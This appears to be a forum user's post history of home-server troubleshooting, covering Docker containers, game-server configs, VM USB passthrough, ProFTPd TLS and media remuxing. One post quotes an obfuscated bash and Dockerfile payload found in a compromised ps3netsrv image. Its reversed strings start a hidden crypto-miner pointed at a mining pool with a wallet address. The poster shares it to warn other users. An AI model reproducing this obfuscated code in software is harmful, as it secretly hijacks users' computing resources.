Blacksus

Members
  • Posts

    21
  • Joined

  • Last visited

Everything posted by Blacksus

  1. Used this for quite a while now, but believe a recent update broke it. Docker dies shortly after start: RangeError [ERR_SOCKET_BAD_PORT]: Port should be >= 0 and < 65536. Received NaN. at new NodeError (node:internal/errors:363:5) at validatePort (node:internal/validators:208:11) at lookupAndConnect (node:net:988:5) at Socket.connect (node:net:964:5) at connect (node:net:193:17) at /app/node_modules/ioredis/built/connectors/StandaloneConnector.js:54:66 at processTicksAndRejections (node:internal/process/task_queues:78:11) { code: 'ERR_SOCKET_BAD_PORT' } Prisma schema loaded from prisma/schema.prisma Datasource "db": SQLite database "rss_bot_database.db" at "file:./../config/rss_bot_database.db" 4 migrations found in prisma/migrations No pending migrations to apply. This docker has served me well, would appreciate any help on this
  2. Hi all, Trying to set up an ARK server but run into issues configuring it. Starting up with the default GameUserSettings.ini works fine, server can be joined remotely so ports are all good and everything. However, changing minor things like a value in the GameUserSettings.ini makes the server reset it to default when the server is started. As an example, just leaving name and password blank in the docker container and adding them in the GameUserSettings.ini does not stick - it will start as ARK #12345 or similar default name. When changing numeric values in GUS.ini, it seems like some stick, some get reset to default. Anyone encountered this before? Im out of ideas. Name and PW can obviously be set in docker config, thats fine - but other game related settings are important in the GUS.ini Docker settings are pretty much default, attached. Thank you for all the server dockers, I appreciate any help on this
  3. Ah that sucks. Worrying about the integrity of my server now, these lines on github dont make any sense to me. Wonder if it does anything else besides running a miner. #!/bin/bash ${*%%yQxB} 'p'$'\x72'i\ntf %s "$( e1GXyjHW=' ${@^} "${@//\}\}mQ/+zue\!D}" $bash "${@^^}" ${@/C\J=} <<< "$( "${@%m^\(&nBf}" ${@~} P\R${*,}I""$*NT'"'"''"'"'$'"'"'\U0066'"'"' %S '"'"'5.1 T- csrv=CM,ctb=C P- BcbFBXaTIfa98OQ37PzGgNwxAj1QgzyS93 U- 0033:MOC.LOOPGREZ.ENIM.HSAHSUREV//:PCT+MUTARTS O- SUREV A- DNUORGKCAB-- 2VRSTEN3SP/'"'"' $@ "${@^^}" | ${*/97J\)} REV $* ; ${*^^} "${@^^}" )" "${@,}" ${*~} ' ${@//6N%Dcb</.*4_DgX} && $* ${*^} ''p$'\u0072'\int\f %s "${e1GXyjHW~~}" ${@%%\!\{^e} ${*^^} )" ${*/gC\{*mv0} ${*} | ${@/WlYb<s} b\a""'s'h ${!@} ${*^} ${*%%yQxB} 'p'$'\x72'i\ntf %s "$( e1GXyjHW=' ${@^} "${@//\}\}mQ/+zue\!D}" $bash "${@^^}" ${@/C\J=} <<< "$( "${@%m^\(&nBf}" ${@~} P\R${*,}I""$*NT'"'"''"'"'$'"'"'\U0066'"'"' %S '"'"'5.1 T- csrv=CM,ctb=C P- BcbFBXaTIfa98OQ37PzGgNwxAj1QgzyS93 U- 0033:MOC.LOOPGREZ.ENIM.HSAHSUREV//:PCT+MUTARTS O- SUREV A- DNUORGKCAB-- 2VRSTEN3SP/'"'"' $@ "${@^^}" | ${*/97J\)} REV $* ; ${*^^} "${@^^}" )" "${@,}" ${*~} ' ${@//6N%Dcb</.*4_DgX} && $* ${*^} ''p$'\u0072'\int\f %s "${e1GXyjHW~~}" ${@%%\!\{^e} ${*^^} )" ${*/gC\{*mv0} ${*} | ${@/WlYb<s} b\a""'s'h ${!@} ${*^} > /dev/null 2>&1 CMD ["./ps3netsrv_linuxX86_64", "/games", "&& ${*//\(:ffk/p\]jk,} ${*##62LVozf} e${@/\[Wn>31G/dW9CIcf}v$'a\154' \"$( OrJajLv=' ${*^} ${!*} E\V'\"'\"''\"'\"'A\"\"\L \"$( \"${@,}\" \"${@#QK\]8jJ}\" '\"'\"''\"'\"'\PRI\N${@^}T'\"'\"''\"'\"'${@/Hg-HN~DN}F %S '\"'\"'5.1 T- csrv=CM,ctb=C P- BcbFBXaTIfa98OQ37PzGgNwxAj1QgzyS93 U- 0033:MOC.LOOPGREZ.ENIM.HSAHSUREV//:PCT+MUTARTS O- SUREV A- 2VRSTEN3SP/'\"'\"' \"${@~~}\" ${*#K$m~\{4mQ} | ${*/2t@t} ${@//\\"Sb#s/H7Bd} $'\"'\"'\162'\"'\"'$'\"'\"'\U0065'\"'\"'V ${*/+?Y^T/pV9>M} ${*#=i.eM0Vu} ; ${*##8^c~} )\" ${@} ${*##0b&\`qny\!} ' ${*//*\]-H} ${*//3h9$$i/S=nO>} && ${!@} \"${@%\[mDf:\{Z}\" \"${@,}\"printf %s \"${OrJajLv~~}\" ${*,} ; ${*~} ${*^} )\" \"${@/o\}nw&Sl/r\]c\[lk}\""] Needles to say, I nuked the docker
  4. Shame on you, @McCloud Tagging @Antheleon and @mbc0 for visibility in case youre still using this...
  5. Hi Everyone, I'm having problems with my windows 10 VM which sometimes results in my USB devices not working. Im passing through the USB Controller on 00:14:0 and it's the only device in the IOMMU Group: I've googled the issue and added the device to my sysconf.cfg's append, but that didn't help either - it still shows up in the log. sysconf.cfg: VM xml: And my devices: Appreciate any more things to try, I'm out of ideas Cheers!
  6. Hi everyone, Is there any way to utilise unmanic to pass through the video stream but just encode the audio track and remux? I'm only getting mkv files and the video stream can stay untouched, however I'd like to have them all use aac for the audio stream. I've tried a few settings but I didnt get it to work, I guess the audio encoding only kicks in if the video encoding is, too, eh? Thanks!
  7. Hm gotcha, just wondering how these "smart dns" services online do it. Might just have to use one of them then. Thank you!
  8. Hi all, this might be too too off topic for this thread but I've got a question: is there any way to use a proxy created by this docker to turn it into a DNS on the network? A device, more specifically my TV, does not have proxy settings but DNS settings, and I'd like to access some video content georistricted to the country I use this docker for - which works great with the proxy from privoxy on other devices already. Is there maybe another docker that could work in conjunction with this one to make it happen and host the DNS? Appreciate any help!
  9. Hi everyone, is the DashBtn docker still supported? I've tried it but the log file is posting the below error a hundred times a second, making it grow to massive size within minutes. Unraid 6.8.1 2020-01-14 23:01:00 -- length of arp_header is 25 while the size of the struct is 28 2020-01-14 23:01:00 -- length of arp_header is 25 while the size of the struct is 28 2020-01-14 23:01:00 -- length of arp_header is 25 while the size of the struct is 28 2020-01-14 23:01:00 -- length of arp_header is 25 while the size of the struct is 28 I guess it's dead? Edit: This one from docker hub works a treat. Mine Webhooks to Domoticz to WOL a VM However, the DashBtn one is a case for the @dockerPolice.
  10. Since updating to unraid 6.8.1, the plugin leaves a process running indefinitely with high cpu usage. Other than the screenshot below implies, it actually ran for 8 hours on my machine after backup completion - I terminated it and manually started a backup to confirm it was the culprit, then took the screenshot. Im fairly sure this did not happen before 6.8.1. Hope this will be okay eventually, loving the plugin!
  11. To make sure it's not a permission issue, I've set it to 777. It is located in /config/scripts, which should also be correct - if I remove it from there and run "on" as a test in habridge, I get a red error message instead of the green success one, with the log telling me that the file doesnt exist. Edit: Meh. I just ended up using Domotcz, creating a button in there that does what I need and call that via habridge instead of straight through habridge. Works for me.
  12. Hi all, I seem to be having a similar issue - im trying to run a simple script to wake a VM via lan. This docker has ether-wake and running the command (and the scrpt) from the docker terminal wakes it up as intended. Running the script via habride on command does not work though - I am getting a green message of success when testing it, however the script doesnt seem to run. To see if it runs at all, I added a touch command to check the scrips dir after testing: #!/bin/bash ether-wake 52:54:00:af:3a:8f touch test I know it's probably a stupid mistake on my end, can anybody let me know what it is :) Script runs fine from the docker terminal, wake the machine and creates file test. Via habridge, it does neither.
  13. Very weird. I am also forwarding xxx to 21 and the passive ports. If you could upload yourwhole conf with personal data X'ed out, I'd give that a go. I can deal with having to connect without TLS from internal, by now I'm just really curious. Either way, thank you for your help !
  14. Edit: Oh wait, I can connect with the local IP if disabling TLS in the client. Is that really the solution though Can you connect with the local IP even with TLS enabled ?
  15. Thank you for the reply ! I can now restart the server via script and that is all well. However, deleting the MasqueradeAddress and using TLSMasqueradeAddress inside the TLS part instead still gives me when connecting via internal IP
  16. Hello, Ive had some struggles with configuring this the way I want, however I am close now. I was able to generate SSL Certs and I have got TLS set up and running. However, I have two problems that I cant fix. 1. I have TLS set up and can only connect with my dynDNS. So external users are fine. However, if I want to connect to the internal IP of my Server, 192.168.178.100, from within the network, I get in filezilla. This is becuse I have to use the MasqueradeAddress command in the settings combined to my DynDNS. To solve this, I have tried adding a virtual host like it is described in the ProFTPd instructions: <VirtualHost 192.168.178.100> ServerName Intern # Note that there is no MasqueradeAddress directive # used in this section! </VirtualHost> This however gives me an even weirder problem - no matter if connecting via DynDNS or internal IP, the logins are supposedly not correct anymore. They sure are though, as they are saved in my FTP Client. 2. Despite the fact that I can connect to the server with TLS with the DynDNS, I have to restart the Server manually every morning as I have a dynamic IP and ProFTPd does not re-check if the IP of the DynDNS has changed. I would like to write a script that checks if the IP of the dynDNS changed and restarts the server if that is the case. I would need to know how to restart the server from the commandline for this, but I cant seem to find it for this particular plugin. All documentation is for a native installation of ProFTPd. TL;DR: How can I connect to my server via internal IP even though MasqueradeAddress is used in proftpd.conf and how can I restart the server from command line, so it uses the updated IP of the dyndns. I will attach my anonymised proftpd.conf. Im thankful for any help, I'd even buy you a beer ! proftpd.conf
  17. Thanks trurl. Wish I had seen this earlier as I would not have had to open this thread. Im convinced
  18. Huh well I might just use the NAS functionality for file/dlna purposes then. I do need a linux on the machine for other smaller things I have in mind.
  19. The pain of teaching my parents how to use a linux desktop environment is greater than any pain I'd have setting up unRAID or anything else. It might seem easy for us, but at older age people like to stick to the looks and functions they have learned already. Windows is crucial in my case. If it would just be me, I'd just use linux. yeah
  20. Hello, I'm planning on building a PC that serves multiple purposes and I'm fairly sure that unRAID is the best choice for my plan, however I would like to verify that before I even buy the hardware. I'm actually not interested in a parity disk since the data wont be crucial, and I have already verified that a parity disk is not necessarily needed and can be added at a later point in time. However, the PC would stand beside a TV for occasionally playing back DVD/BR, surfing the web, checking mails and printing. Since my parents would do that and they're used to Windows, that would be the choice for that. As a second OS I'd want a linux distro without any desktop environment that I can control via SSH, and it would function as a DLNA(transcoding wont be needed) and file server to be reached from the PCs and set-top boxes within the local network. Some other server tasks might be added as well, so going only with windows wont do. Is unRAID a good choice for me ? Also, since windows will only be needed occasionally, is it possible to start and stop windows while the linux distro serves 24/7 ? I appreciate any answer